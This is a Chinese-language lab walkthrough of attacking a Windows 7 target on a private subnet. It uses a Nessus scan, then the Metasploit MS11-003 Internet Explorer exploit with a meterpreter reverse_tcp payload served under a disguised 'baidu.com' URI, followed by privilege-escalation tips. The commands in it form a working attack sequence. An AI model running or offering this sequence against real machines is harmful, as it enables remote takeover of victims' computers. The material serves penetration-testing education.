网安——Metasploit攻击win7实例

利用Nessus扫描目标主机

执行命令 /etc/init.d/nessusd start 启动Nessus服务

网安——Metasploit攻击win7实例

访问Nessus控制端https://127.0.0.1:8834/

网安——Metasploit攻击win7实例

新建一个扫描,依次选择“New Scan”-“Basic Network Scan”,如下图所示。

网安——Metasploit攻击win7实例

配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选择默认,配置完成点击Save。选择对整个10.1.1.0/24网段进行扫描

网安——Metasploit攻击win7实例

扫描结束后,Nessus会很直观的显示出目标网段的安全情况。下图显示了整个网段的安全信息。Nessus将安全问题归类为Info/Low/Medium/High/Critical五个等级,其中Critical等级的问题是最危险的,Info级别的问题通常是无关痛痒的信息显示问题。

网安——Metasploit攻击win7实例

重点关注10.1.1.129主机,即win7靶机,Nessus扫描出该主机存在四个最高危漏洞、2个高危漏洞及其它漏洞问题

网安——Metasploit攻击win7实例

选中高危漏洞,Nessus给出了该漏洞的介绍、风险信息、解决方案等详细信息。Risk information对于攻击者来说非常有用,可以根据Risk information去Google搜索是否存在已知的漏洞利用Exp。

利用MS11_003 IE漏洞攻击win7主机

1.在kali中执行“msfconsole”,启动metasploit

网安——Metasploit攻击win7实例

2.运行命令:“use exploit/windows/browser/ms11_003_ie_css_import”选择漏洞利用EXP

网安——Metasploit攻击win7实例

3.运行命令:show options,查看配置选项

网安——Metasploit攻击win7实例

4.设置生成的恶意网页的URI为baidu.com

运行命令:set URIPATH baidu.com

网安——Metasploit攻击win7实例

5.为防止服务器端口冲突,设置服务器端口为8060,避开常用端口8080

运行命令:set SRVPORT 8060

网安——Metasploit攻击win7实例

6.设置攻击负载

运行命令:set PAYLOAD windows/meterpreter/reverse_tcp

网安——Metasploit攻击win7实例

7.查看配置选项

运行命令: show options

网安——Metasploit攻击win7实例

8.设置HOST以绑定本地IP

set LHOST 10.1.1.128

网安——Metasploit攻击win7实例

9.为避免冲突设置LPORT

运行命令:set LPORT 8866

网安——Metasploit攻击win7实例

10.运行令“exploit”开始进行攻击,生成恶意网页和做好其他准备,只等受害者访问我们构造的恶意网页

网安——Metasploit攻击win7实例

11.在 Win7靶机打开IE,访问http://10.1.1.128:8060/baidu.com,模拟受害者误点击网页,靶机IE如下图所示,攻击者Metasploit显示如下图所示信息表明攻击成功。

网安——Metasploit攻击win7实例

网安——Metasploit攻击win7实例

12.验证攻击是否成功。列出当前成功建立的回话,任意进入一个回话,查看攻击者的身份。可以尝试使用getsystem进行进一步的提权,如果提权失败则可以采取上传提权exe程序进行提权的方案获得最高权限。

 

网安——Metasploit攻击win7实例

 

 

 答题:

网安——Metasploit攻击win7实例

 

 

 

 

网安——Metasploit攻击win7实例

 

上一篇:Metasploit入侵win7


下一篇:Metasploit 攻击 win7 实例